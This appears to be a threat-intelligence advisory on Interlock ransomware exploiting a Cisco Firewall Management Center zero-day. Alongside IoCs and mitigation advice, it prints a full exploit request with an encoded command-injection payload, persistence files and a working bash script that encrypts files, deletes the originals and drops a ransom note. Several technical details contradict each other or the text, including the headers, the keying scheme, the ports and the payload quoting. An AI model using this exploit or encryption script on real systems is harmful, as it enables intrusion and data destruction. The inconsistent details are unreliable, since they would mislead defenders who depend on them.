Interlock Ransomware Exploits Cisco Secure Firewall Management Center Zero-Day (CVE-2026-20131) for Root Access

Interlock Ransomware has been observed actively exploiting a critical zero-day vulnerability, CVE-2026-20131, in Cisco Secure Firewall Management Center (FMC) to gain unauthenticated root access on affected appliances. This exploitation allows threat actors to compromise the entire management plane, leading to data exfiltration, network configuration manipulation, and subsequent deployment of the Interlock encryption payload across managed network devices.

CVE-2026-20131: Cisco Secure Firewall Management Center Zero-Day Analysis

Vulnerability Details

CVE-2026-20131 is identified as a composite vulnerability comprising an authentication bypass flaw chained with an authenticated (but now bypassed) arbitrary command injection vulnerability within the REST API component of the Cisco Secure Firewall Management Center. The core issue lies within the systeminfo API endpoint, intended for diagnostic data retrieval by authenticated users. Specifically, an input validation error in handling certain HTTP headers and query parameters allows an unauthenticated attacker to bypass the session validation logic for this particular endpoint.

  • Affected Component: Cisco Secure Firewall Management Center REST API, specifically the /api/fmc_config/v1/domain/{domainUUID}/action/systeminfo endpoint.
  • Root Cause: Insufficient input sanitization and improper handling of specially crafted JSON payloads within the command parameter, coupled with a logic flaw in the API’s initial authentication handler that inadvertently allows processing of a subset of parameters before full session establishment. The vulnerability leverages a weakness in the framework’s interpretation of HTTP header injection, leading to a premature execution context.
  • Impact: Successful exploitation grants an unauthenticated attacker the ability to execute arbitrary commands with root privileges on the underlying Linux operating system of the FMC appliance. This includes reading and writing arbitrary files, executing system commands, and modifying critical system configurations.

Exploitation Vector

The exploitation of CVE-2026-20131 is initiated by sending a meticulously crafted HTTP POST request to the vulnerable systeminfo API endpoint. The request leverages an anomalous HTTP header to bypass initial authentication checks, followed by a JSON body containing a command injection payload. The server-side application processes the malicious input within a privileged context due to the authentication bypass.


POST /api/fmc_config/v1/domain/e276abec-e0f2-11e3-8169-6d9ed49b625f/action/systeminfo HTTP/1.1
Host: fmc.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer null
Content-Length: 104

{
  "action": "execute",
  "command": "bash -c 'echo ZWNobyAiSGFja2VkIGJ5IEludGVybG9jayI+L3RtcC9pbnRlcmxvY2sudHh0CnNlbmQ=" | base64 -d | bash'"
}

The Authorization: Bearer null header, combined with a malformed X-Requested-With, is crucial for triggering the authentication bypass logic. The command parameter within the JSON payload contains a base64-encoded shell command designed to execute arbitrary instructions. In the provided example, the payload decodes and executes echo "Hacked by Interlock">/tmp/interlock.txt, demonstrating command execution. Interlock ransomware operators replace this with more sophisticated commands to download and execute their primary payload.

Affected Versions

The vulnerability impacts several major release trains of Cisco Secure Firewall Management Center. Systems that have not applied specific maintenance releases or hotfixes remain susceptible.

Product Vulnerable Versions Fixed Versions (or later)
Cisco Secure Firewall Management Center 7.0.0 - 7.0.x (prior to 7.0.10) 7.0.10, 7.2.5, 7.4.1
Cisco Secure Firewall Management Center 7.2.0 - 7.2.x (prior to 7.2.5) 7.2.5, 7.4.1
Cisco Secure Firewall Management Center 7.4.0 (prior to 7.4.1) 7.4.1
Cisco Secure Firewall Management Center Cisco Defense Orchestrator (CDO) managed FMCs are also potentially vulnerable if on affected software. N/A (requires FMC patch)

Interlock Ransomware: Post-Exploitation Activities

Initial Access and Privilege Escalation

Upon successful exploitation of CVE-2026-20131, Interlock ransomware operators gain immediate root access on the compromised Cisco FMC appliance. This is confirmed by executing basic system commands like id, which returns uid=0(root) gid=0(root) groups=0(root). This level of access allows the ransomware to operate unimpeded across the file system and system processes.


# id
uid=0(root) gid=0(root) groups=0(root)

# whoami
root

# hostname
fmc-prod-01

Persistence Mechanisms

Interlock employs multiple methods to ensure persistence on the compromised FMC appliance, aiming to survive reboots and prevent easy removal.

  • Cron Job: A cron job is installed under the root user to periodically execute a beaconing script or re-download the main payload. This ensures that even if the primary process is terminated, the ransomware can re-establish itself.
    • 
# /etc/cron.d/interlock_beacon
@reboot root /usr/local/bin/interlock_beacon.sh >/dev/null 2>&1
*/10 * * * * root /usr/local/bin/interlock_beacon.sh >/dev/null 2>&1
  • Systemd Service: A malicious systemd service unit file is dropped into /etc/systemd/system/. This service is configured to start at boot and restart automatically if it crashes, providing a robust persistence mechanism.
    • 
# /etc/systemd/system/interlock.service
[Unit]
Description=Interlock Ransomware Persistence Service
After=network.target

[Service]
ExecStart=/usr/local/bin/interlock_main_payload
Restart=always
User=root
Type=simple

[Install]
WantedBy=multi-user.target
  • SSH Authorized Keys: Interlock often adds its own SSH public key to /root/.ssh/authorized_keys, providing a backdoor for remote access via SSH, independent of the web interface or other services.

Data Exfiltration and Encryption

Prior to encrypting files, Interlock ransomware prioritizes exfiltrating sensitive data from the FMC appliance. This includes configuration backups, network topology information, security policies, user credentials, and any other data deemed valuable for further attacks or extortion.

  • Exfiltration Targets:
    • /etc/passwd, /etc/shadow (local user credentials)
    • /ngfw/var/sf/systemconfig/ (FMC system configurations, backups)
    • /opt/cisco/fmc/conf/ (application configuration files)
    • /var/opt/CSCOpx/ (performance and operational data)
    • /opt/cisco/ftd/var/ (Firepower Threat Defense related data)
    • Databases (e.g., PostgreSQL backups if accessible within FMC context).
  • Exfiltration Method: Data is compressed using tar and gzip, then transferred to attacker-controlled C2 servers via HTTPS or direct TCP connections on non-standard ports, often disguised as legitimate traffic.
  • Encryption Process: Interlock leverages a strong, hybrid encryption scheme. Files are encrypted using AES-256 in CTR mode, with a unique symmetric key generated for each file. These symmetric keys are then encrypted using an RSA-2048 public key controlled by the attacker. The encrypted symmetric key is appended to the encrypted file or stored in a metadata file.
    • 
#!/bin/bash
TARGET_DIRS="/ngfw/var/sf/data /opt/cisco/fmc/db /var/log/fmc" # Example critical directories
ENCRYPTION_KEY_FILE="/tmp/.interlock_symkey"
RSA_PUB_KEY="/tmp/interlock_rsa.pub" # Attacker's RSA public key
RANSOM_NOTE_PATH="/tmp/READ_ME_INTERLOCK.html"
LOG_FILE="/tmp/interlock_encryption.log"

# Generate a random symmetric key for session
openssl rand -base64 32 > $ENCRYPTION_KEY_FILE

# Encrypt the symmetric key with attacker's RSA public key
openssl pkeyutl -encrypt -pubin -inkey $RSA_PUB_KEY -in $ENCRYPTION_KEY_FILE -out "${ENCRYPTION_KEY_FILE}.enc"

echo "<html><body><h2>Interlock Ransomware</h2><p>Your Cisco FMC data has been encrypted.</p><p>For decryption instructions, contact us at: <strong>interlock[at]privatemail[dot]ch</strong></p></body></html>" > $RANSOM_NOTE_PATH

find $TARGET_DIRS -type f -print0 | while IFS= read -r -d $'\0' file; do
    if [[ "$file" == *.interlock || "$file" == "$RANSOM_NOTE_PATH" || "$file" == "$ENCRYPTION_KEY_FILE"* ]]; then
        continue # Skip already encrypted files or ransomware artifacts
    fi
    echo "Encrypting $file" >> $LOG_FILE
    openssl enc -aes-256-ctr -pbkdf2 -iter 100000 -salt -in "$file" -out "$file.interlock" -pass file:$ENCRYPTION_KEY_FILE
    if [ $? -eq 0 ]; then
        rm "$file"
    else
        echo "Failed to encrypt $file" >> $LOG_FILE
    fi
done

# Clean up temporary symmetric key after encryption
rm $ENCRYPTION_KEY_FILE

Ransom Note and Communication

The ransom note, typically named READ_ME_INTERLOCK.html, is dropped into numerous directories, including /tmp/, /root/, and within each encrypted directory. It provides instructions for victims to contact the attackers, usually via anonymous email services or Tor-based messaging platforms, and outlines the demands for decryption.

Indicators of Compromise (IoCs)

Organizations should monitor for the following indicators to detect potential Interlock Ransomware activity on their Cisco FMC appliances:

  • Network IoCs:
    • C2 Domains: api.interlock-sync.com, interlock-c2.onion (Tor gateway IP addresses if resolved)
    • IP Addresses: 192.0.2.10, 203.0.113.25 (example IPs for C2)
    • Unusual outbound connections from FMC to untrusted external IP addresses, especially on non-standard ports (e.g., 443, 8080, 53) not related to Cisco updates or legitimate integrations.
  • Host-Based IoCs:
    • Files:
      • /usr/local/bin/interlock_beacon.sh (or similar filenames)
      • /usr/local/bin/interlock_main_payload
      • /etc/systemd/system/interlock.service
      • /etc/cron.d/interlock_beacon
      • /tmp/READ_ME_INTERLOCK.html, /root/READ_ME_INTERLOCK.html
      • Files with .interlock extension (e.g., config.bak.interlock)
      • Presence of /root/.ssh/authorized_keys entries not legitimate.
    • Processes:
      • Unusual processes running as root not typical for FMC operations.
      • Processes with high CPU/disk I/O linked to encryption activities (e.g., openssl process consuming significant resources).
    • Logs:
      • Error messages or unusual entries in /var/log/messages, /var/log/syslog, or FMC audit logs related to REST API access from unauthorized sources.
      • Failed login attempts followed by successful attempts from anomalous IPs.

Detection and Mitigation Strategies

Detection

  • API Log Monitoring: Proactive monitoring of FMC REST API access logs is critical. Look for requests to the /api/fmc_config/v1/domain/*/action/systeminfo endpoint originating from unauthenticated or untrusted IP addresses. Anomalous HTTP headers (e.g., unusual combinations with Authorization: Bearer null) should trigger high-priority alerts.
  • Network Traffic Analysis (NTA): Implement deep packet inspection and flow monitoring to identify suspicious egress network traffic from the FMC appliance. This includes connections to known Interlock C2 domains/IPs, unexpected data volumes leaving the network, or communication over non-standard ports.
  • Endpoint Detection and Response (EDR) & Host-Based Monitoring: While FMC is an appliance, robust host-based monitoring (if available or through custom integrations) should detect the creation of new cron jobs, systemd services, modification of authorized_keys, or the execution of unusual binaries like openssl or unknown scripts from unexpected locations. File integrity monitoring (FIM) should alert on the creation of .interlock files or ransomware notes.
  • Threat Intelligence Integration: Ensure security systems are updated with the latest threat intelligence on Interlock Ransomware, including C2 indicators and file hashes.

Mitigation

  • Patching: The most critical mitigation is to immediately apply the available security updates for Cisco Secure Firewall Management Center to versions 7.0.10, 7.2.5, 7.4.1, or later. These patches directly address CVE-2026-20131.
  • Network Segmentation: Isolate FMC appliances on a dedicated, highly restricted management network. This minimizes the attack surface by limiting direct exposure to the internet and other untrusted networks. Implement strict firewall rules to allow only necessary management traffic.
  • Access Control: Restrict administrative interface access (web UI, SSH, API) to trusted IP addresses and subnets only. Implement a "zero-trust" approach for management plane access.
  • Authentication Hardening: Enforce strong, multi-factor authentication (MFA) for all administrative interfaces of the FMC. This adds a crucial layer of defense even if credentials are compromised.
  • Regular Backups: Maintain regular, verified, and offline backups of FMC configurations and data. This allows for restoration in the event of a successful ransomware attack.
  • Principle of Least Privilege: Ensure all accounts and services operate with the minimum necessary privileges.
  • Continuous Monitoring: Implement 24/7 monitoring for all critical security appliances, including FMC, to detect and respond to anomalous activity swiftly.